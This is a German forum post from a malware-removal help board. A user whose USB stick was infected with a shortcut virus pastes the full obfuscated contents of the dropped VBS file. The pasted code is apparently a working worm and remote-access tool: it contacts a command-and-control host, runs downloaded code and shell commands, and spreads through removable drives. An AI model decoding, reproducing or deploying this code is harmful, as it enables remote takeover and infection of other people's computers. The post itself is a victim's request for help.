Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Flash Drive Shortcut Virus wtbchkxbde..vbs (https://www.trojaner-board.de/152384-flash-drive-shortcut-virus-wtbchkxbde-vbs.html)

fxak 11.04.2014 23:50

Flash Drive Shortcut Virus wtbchkxbde..vbs
 
Hallo Trojaner-Board
Ich bin gerade auf Praxissemester im Regenwald von Papua Neuguinea und habe hier sehr schlechtes aber trotzdem ziemlich teures Internet. Ich bitte also um Verständnis dass ich nicht im Voraus irgendwelche Programme heruntergeladen und Logfiles erstellt habe, werde dies aber machen wenn ihr es für nötig haltet, ich würde aber darum bitten immer an die Bandbreite-schonendste Möglichkeit zu denken und mir evtl einen Link dazu zu posten, jedes Kilobyte ist bares Geld :)
Falls es die Lösung für mein Problem hier schon irgendwo gibt wäre ein kurzer Hinweis nett.

Ich benutze Windows 7 64 bit auf einem Acer Aspire Laptop

Habe einem Dorfbewohner hier meinen USB-Stick gegeben und dann ohne nachzudenken darauf zugegriffen. Alle Dateien wurden versteckt und durch Verknüpfungen ersetzt. Außerdem befindet sich eine Datei namens "wtbchkxbde..vbs" auf dem Stick, Erstelldatum 22.9.13, Größe 72 kB (wobei auf dem Stick nach dem Formatieren 90 mB belegt sind, keine Ahnung ob das normal ist)

Die .vbs enthält folgenden Text:

Code:

mfvasRGZIhZnddvphsOW="112$@133$@164$@105$@187$@174$@172$@184$@173$@174$@187$@105$@131$@105$@177$@184$@190$@173$@178$@183$@178$@105$@113$@172$@114$@105$@188$@180$@194$@185$@174$@105$@131$@105$@177$@184$@190$@173$@178$@183$@178$@118$@175$@193$@105$@166$@135$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@172$@184$@183$@175$@178$@176$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@86$@83$@177$@184$@188$@189$@105$@134$@105$@107$@171$@187$@184$@192$@188$@174$@187$@185$@187$@184$@189$@174$@172$@189$@119$@177$@184$@185$@189$@184$@119$@184$@187$@176$@107$@86$@83$@185$@184$@187$@189$@105$@134$@105$@129$@123$@127$@129$@86$@83$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@134$@105$@107$@110$@170$@185$@185$@173$@170$@189$@170$@110$@107$@86$@83$@181$@183$@180$@175$@178$@181$@174$@105$@134$@105$@189$@187$@190$@174$@86$@83$@181$@183$@180$@175$@184$@181$@173$@174$@187$@105$@134$@105$@189$@187$@190$@174$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@185$@190$@171$@181$@178$@172$@105$@191$@170$@187$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@86$@83$@173$@178$@182$@105$@188$@177$@174$@181$@181$@184$@171$@179$@105$@86$@83$@188$@174$@189$@105$@188$@177$@174$@181$@181$@184$@171$@179$@105$@134$@105$@192$@188$@172$@187$@178$@185$@189$@119$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@192$@188$@172$@187$@178$@185$@189$@119$@188$@177$@174$@181$@181$@107$@114$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@86$@83$@188$@174$@189$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@188$@172$@187$@178$@185$@189$@178$@183$@176$@119$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@174$@172$@189$@107$@114$@86$@83$@173$@178$@182$@105$@177$@189$@189$@185$@184$@171$@179$@86$@83$@188$@174$@189$@105$@177$@189$@189$@185$@184$@171$@179$@105$@134$@105$@172$@187$@174$@170$@189$@174$@184$@171$@179$@174$@172$@189$@113$@107$@182$@188$@193$@182$@181$@123$@119$@193$@182$@181$@177$@189$@189$@185$@107$@114$@86$@83$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@185$@187$@178$@191$@170$@189$@105$@191$@170$@187$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@86$@83$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@134$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@183$@170$@182$@174$@86$@83$@188$@189$@170$@187$@189$@190$@185$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@188$@185$@174$@172$@178$@170$@181$@175$@184$@181$@173$@174$@187$@188$@105$@113$@107$@188$@189$@170$@187$@189$@190$@185$@107$@114$@105$@111$@105$@107$@165$@107$@86$@83$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@114$@105$@111$@105$@107$@165$@107$@86$@83$@178$@175$@105$@183$@184$@189$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@175$@184$@181$@173$@174$@187$@174$@193$@178$@188$@189$@188$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@114$@105$@189$@177$@174$@183$@105$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@174$@193$@185$@170$@183$@173$@174$@183$@191$@178$@187$@184$@183$@182$@174$@183$@189$@188$@189$@187$@178$@183$@176$@188$@113$@107$@110$@189$@174$@182$@185$@110$@107$@114$@105$@111$@105$@107$@165$@107$@86$@83$@188$@185$@181$@178$@189$@174$@187$@105$@134$@105$@107$@133$@107$@105$@111$@105$@107$@197$@107$@105$@111$@105$@107$@135$@107$@86$@83$@188$@181$@174$@174$@185$@105$@134$@105$@126$@121$@121$@121$@105$@86$@83$@173$@178$@182$@105$@187$@174$@188$@185$@184$@183$@188$@174$@86$@83$@173$@178$@182$@105$@172$@182$@173$@86$@83$@173$@178$@182$@105$@185$@170$@187$@170$@182$@86$@83$@178$@183$@175$@184$@105$@134$@105$@107$@107$@86$@83$@190$@188$@171$@188$@185$@187$@174$@170$@173$@178$@183$@176$@105$@134$@105$@107$@107$@86$@83$@188$@189$@170$@187$@189$@173$@170$@189$@174$@105$@134$@105$@107$@107$@86$@83$@173$@178$@182$@105$@184$@183$@174$@184$@183$@172$@174$@86$@83$@86$@83$@112$@134$@118$@134$@118$@134$@118$@134$@118$@134$@105$@172$@184$@173$@174$@105$@188$@189$@170$@187$@189$@105$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@118$@134$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@86$@83$@86$@83$@178$@183$@188$@189$@170$@183$@172$@174$@86$@83$@192$@177$@178$@181$@174$@105$@189$@187$@190$@174$@86$@83$@86$@83$@178$@183$@188$@189$@170$@181$@181$@86$@83$@86$@83$@187$@174$@188$@185$@184$@183$@188$@174$@105$@134$@105$@107$@107$@86$@83$@187$@174$@188$@185$@184$@183$@188$@174$@105$@134$@105$@185$@184$@188$@189$@105$@113$@107$@178$@188$@118$@187$@174$@170$@173$@194$@107$@117$@107$@107$@114$@86$@83$@172$@182$@173$@105$@134$@105$@188$@185$@181$@178$@189$@105$@113$@187$@174$@188$@185$@184$@183$@188$@174$@117$@188$@185$@181$@178$@189$@174$@187$@114$@86$@83$@188$@174$@181$@174$@172$@189$@105$@172$@170$@188$@174$@105$@172$@182$@173$@105$@113$@121$@114$@86$@83$@172$@170$@188$@174$@105$@107$@174$@193$@172$@174$@172$@190$@189$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@174$@193$@174$@172$@190$@189$@174$@105$@185$@170$@187$@170$@182$@86$@83$@172$@170$@188$@174$@105$@107$@190$@185$@173$@170$@189$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@184$@183$@174$@184$@183$@172$@174$@119$@172$@181$@184$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@174$@189$@105$@184$@183$@174$@184$@183$@172$@174$@105$@134$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@184$@185$@174$@183$@189$@174$@193$@189$@175$@178$@181$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@117$@123$@117$@105$@175$@170$@181$@188$@174$@114$@86$@83$@105$@105$@105$@105$@105$@105$@184$@183$@174$@184$@183$@172$@174$@119$@192$@187$@178$@189$@174$@105$@185$@170$@187$@170$@182$@86$@83$@105$@105$@105$@105$@105$@105$@184$@183$@174$@184$@183$@172$@174$@119$@172$@181$@184$@188$@174$@86$@83$@105$@105$@105$@105$@105$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@190$@183$@105$@107$@192$@188$@172$@187$@178$@185$@189$@119$@174$@193$@174$@105$@120$@120$@139$@105$@107$@105$@111$@105$@172$@177$@187$@113$@124$@125$@114$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@173$@178$@187$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@105$@111$@105$@172$@177$@187$@113$@124$@125$@114$@86$@83$@105$@105$@105$@105$@105$@105$@192$@188$@172$@187$@178$@185$@189$@119$@186$@190$@178$@189$@105$@86$@83$@172$@170$@188$@174$@105$@107$@190$@183$@178$@183$@188$@189$@170$@181$@181$@107$@86$@83$@105$@105$@105$@105$@105$@105$@190$@183$@178$@183$@188$@189$@170$@181$@181$@86$@83$@172$@170$@188$@174$@105$@107$@188$@174$@183$@173$@107$@86$@83$@105$@105$@105$@105$@105$@105$@173$@184$@192$@183$@181$@184$@170$@173$@105$@172$@182$@173$@105$@113$@122$@114$@117$@172$@182$@173$@105$@113$@123$@114$@86$@83$@172$@170$@188$@174$@105$@107$@188$@178$@189$@174$@118$@188$@174$@183$@173$@107$@86$@83$@105$@105$@105$@105$@105$@105$@188$@178$@189$@174$@173$@184$@192$@183$@181$@184$@170$@173$@174$@187$@105$@172$@182$@173$@105$@113$@122$@114$@117$@172$@182$@173$@105$@113$@123$@114$@86$@83$@172$@170$@188$@174$@105$@107$@187$@174$@172$@191$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@190$@185$@181$@184$@170$@173$@105$@113$@185$@170$@187$@170$@182$@114$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@183$@190$@182$@118$@173$@187$@178$@191$@174$@187$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@174$@183$@190$@182$@118$@173$@187$@178$@191$@174$@187$@107$@117$@174$@183$@190$@182$@173$@187$@178$@191$@174$@187$@105$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@183$@190$@182$@118$@175$@170$@175$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@174$@183$@190$@182$@118$@175$@170$@175$@107$@117$@174$@183$@190$@182$@175$@170$@175$@105$@113$@185$@170$@187$@170$@182$@114$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@183$@190$@182$@118$@185$@187$@184$@172$@174$@188$@188$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@174$@183$@190$@182$@118$@185$@187$@184$@172$@174$@188$@188$@107$@117$@174$@183$@190$@182$@185$@187$@184$@172$@174$@188$@188$@105$@105$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@172$@182$@173$@118$@188$@177$@174$@181$@181$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@185$@184$@188$@189$@105$@107$@178$@188$@118$@172$@182$@173$@118$@188$@177$@174$@181$@181$@107$@117$@172$@182$@173$@188$@177$@174$@181$@181$@105$@113$@185$@170$@187$@170$@182$@114$@105$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@173$@174$@181$@174$@189$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@173$@174$@181$@174$@189$@174$@175$@170$@175$@105$@113$@185$@170$@187$@170$@182$@114$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@174$@193$@178$@189$@118$@185$@187$@184$@172$@174$@188$@188$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@174$@193$@178$@189$@185$@187$@184$@172$@174$@188$@188$@105$@113$@185$@170$@187$@170$@182$@114$@105$@86$@83$@172$@170$@188$@174$@105$@105$@107$@188$@181$@174$@174$@185$@107$@86$@83$@105$@105$@105$@105$@105$@105$@185$@170$@187$@170$@182$@105$@134$@105$@172$@182$@173$@105$@113$@122$@114$@86$@83$@105$@105$@105$@105$@105$@105$@188$@181$@174$@174$@185$@105$@134$@105$@174$@191$@170$@181$@105$@113$@185$@170$@187$@170$@182$@114$@105$@105$@105$@105$@105$@105$@105$@105$@86$@83$@174$@183$@173$@105$@188$@174$@181$@174$@172$@189$@86$@83$@86$@83$@192$@188$@172$@187$@178$@185$@189$@119$@188$@181$@174$@174$@185$@105$@188$@181$@174$@174$@185$@86$@83$@86$@83$@192$@174$@183$@173$@86$@83$@86$@83$@86$@83$@188$@190$@171$@105$@178$@183$@188$@189$@170$@181$@181$@86$@83$@184$@183$@105$@174$@187$@187$@184$@187$@105$@187$@174$@188$@190$@182$@174$@105$@183$@174$@193$@189$@86$@83$@173$@178$@182$@105$@181$@183$@180$@184$@171$@179$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@183$@170$@182$@174$@86$@83$@173$@178$@182$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@86$@83$@173$@178$@182$@105$@175$@178$@181$@174$@178$@172$@184$@183$@86$@83$@173$@178$@182$@105$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@86$@83$@86$@83$@190$@185$@188$@189$@170$@187$@189$@86$@83$@175$@184$@187$@105$@174$@170$@172$@177$@105$@173$@187$@178$@191$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@173$@187$@178$@191$@174$@188$@86$@83$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@178$@188$@187$@174$@170$@173$@194$@105$@134$@105$@189$@187$@190$@174$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@175$@187$@174$@174$@188$@185$@170$@172$@174$@105$@105$@135$@105$@121$@105$@189$@177$@174$@183$@86$@83$@178$@175$@105$@105$@173$@187$@178$@191$@174$@119$@173$@187$@178$@191$@174$@189$@194$@185$@174$@105$@105$@134$@105$@122$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@172$@184$@185$@194$@175$@178$@181$@174$@105$@192$@188$@172$@187$@178$@185$@189$@119$@188$@172$@187$@178$@185$@189$@175$@190$@181$@181$@183$@170$@182$@174$@105$@117$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@189$@187$@190$@174$@86$@83$@105$@105$@105$@105$@178$@175$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@175$@178$@181$@174$@174$@193$@178$@188$@189$@188$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@178$@181$@174$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@105$@111$@105$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@123$@116$@125$@86$@83$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@175$@178$@181$@174$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@114$@119$@143$@178$@181$@174$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@183$@184$@189$@105$@181$@183$@180$@175$@178$@181$@174$@105$@189$@177$@174$@183$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@181$@172$@170$@188$@174$@105$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@105$@113$@190$@171$@184$@190$@183$@173$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@114$@114$@114$@105$@133$@135$@105$@107$@181$@183$@180$@107$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@123$@116$@125$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@190$@172$@170$@188$@174$@105$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@114$@105$@133$@135$@105$@190$@172$@170$@188$@174$@105$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@114$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@183$@170$@182$@174$@105$@134$@105$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@119$@107$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@188$@174$@189$@105$@181$@183$@180$@184$@171$@179$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@172$@187$@174$@170$@189$@174$@188$@177$@184$@187$@189$@172$@190$@189$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@105$@111$@105$@175$@178$@181$@174$@183$@170$@182$@174$@105$@113$@121$@114$@105$@111$@105$@107$@119$@181$@183$@180$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@178$@183$@173$@184$@192$@188$@189$@194$@181$@174$@105$@134$@105$@128$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@189$@170$@187$@176$@174$@189$@185$@170$@189$@177$@105$@134$@105$@107$@172$@182$@173$@119$@174$@193$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@184$@187$@180$@178$@183$@176$@173$@178$@187$@174$@172$@189$@184$@187$@194$@105$@134$@105$@107$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@170$@187$@176$@190$@182$@174$@183$@189$@188$@105$@134$@105$@107$@120$@172$@105$@188$@189$@170$@187$@189$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@105$@107$@111$@188$@189$@170$@187$@189$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@107$@111$@174$@193$@178$@189$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@175$@178$@181$@174$@178$@172$@184$@183$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@172$@181$@170$@188$@188$@174$@188$@165$@107$@105$@111$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$@113$@107$@145$@148$@142$@162$@168$@149$@152$@140$@138$@149$@168$@150$@138$@140$@145$@146$@151$@142$@165$@188$@184$@175$@189$@192$@170$@187$@174$@165$@172$@181$@170$@188$@188$@174$@188$@165$@119$@107$@105$@111$@105$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@113$@190$@171$@184$@190$@183$@173$@113$@188$@185$@181$@178$@189$@113$@175$@178$@181$@174$@119$@183$@170$@182$@174$@117$@105$@107$@119$@107$@114$@114$@114$@111$@105$@107$@165$@107$@114$@105$@111$@105$@107$@165$@173$@174$@175$@170$@190$@181$@189$@178$@172$@184$@183$@165$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@105$@178$@183$@188$@189$@187$@105$@113$@175$@178$@181$@174$@178$@172$@184$@183$@117$@107$@117$@107$@114$@105$@134$@105$@121$@105$@189$@177$@174$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@178$@181$@174$@119$@185$@170$@189$@177$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@181$@188$@174$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@178$@172$@184$@183$@181$@184$@172$@170$@189$@178$@184$@183$@105$@134$@105$@175$@178$@181$@174$@178$@172$@184$@183$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@188$@170$@191$@174$@113$@114$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@174$@183$@173$@105$@178$@175$@86$@83$@105$@105$@105$@105$@183$@174$@193$@189$@86$@83$@105$@105$@105$@105$@175$@184$@187$@105$@174$@170$@172$@177$@105$@175$@184$@181$@173$@174$@187$@105$@178$@183$@105$@175$@178$@181$@174$@188$@194$@188$@189$@174$@182$@184$@171$@179$@119$@176$@174$@189$@175$@184$@181$@173$@174$@187$@113$@105$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@114$@119$@188$@190$@171$@175$@184$@181$@173$@174$@187$@188$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@178$@175$@105$@183$@184$@189$@105$@181$@183$@180$@175$@184$@181$@173$@174$@187$@105$@189$@177$@174$@183$@105$@174$@193$@178$@189$@105$@175$@184$@187$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@119$@170$@189$@189$@187$@178$@171$@190$@189$@174$@188$@105$@134$@105$@123$@116$@125$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@105$@134$@105$@175$@184$@181$@173$@174$@187$@119$@183$@170$@182$@174$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@188$@174$@189$@105$@181$@183$@180$@184$@171$@179$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@172$@187$@174$@170$@189$@174$@188$@177$@184$@187$@189$@172$@190$@189$@105$@113$@173$@187$@178$@191$@174$@119$@185$@170$@189$@177$@105$@111$@105$@107$@165$@107$@105$@105$@111$@105$@175$@184$@181$@173$@174$@187$@183$@170$@182$@174$@105$@111$@105$@107$@119$@181$@183$@180$@107$@114$@105$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@178$@183$@173$@184$@192$@188$@189$@194$@181$@174$@105$@134$@105$@128$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@189$@170$@187$@176$@174$@189$@185$@170$@189$@177$@105$@134$@105$@107$@172$@182$@173$@119$@174$@193$@174$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@192$@184$@187$@180$@178$@183$@176$@173$@178$@187$@174$@172$@189$@184$@187$@194$@105$@134$@105$@107$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@181$@183$@180$@184$@171$@179$@119$@170$@187$@176$@190$@182$@174$@183$@189$@188$@105$@134$@105$@107$@120$@172$@105$@188$@189$@170$@187$@189$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@178$@183$@188$@189$@170$@181$@181$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@105$@107$@111$@188$@189$@170$@187$@189$@105$@174$@193$@185$@181$@184$@187$@174$@187$@105$@107$@105$@111$@105$@187$@174$@185$@181$@170$@172$@174$@113$@175$@184$@181$@173$@174$@187$@119$@183$@170$@182$@174$@117$@107$@105$@107$@117$@105$@172$@177$@187$@192$@113$@124$@125$@114$@105$@111$@105$@107$@105$@107$@105$@111$@105$@172$@177$@187$@192$@113$@124$@125$@114$@114$@105$@111$@107$@111$@174$@193$@178$@189$@107$@86$@83$@105$@105$@105$@105$@105$@105$@105$@105$@175$@184$@181$@173$@174$@187$@178$@172$@184$@183$@105$@134$@105$@188$@177$@174$@181$@181$@184$@171$@179$@119$@187$@174$@176$@187$@174$@170$@173$@105$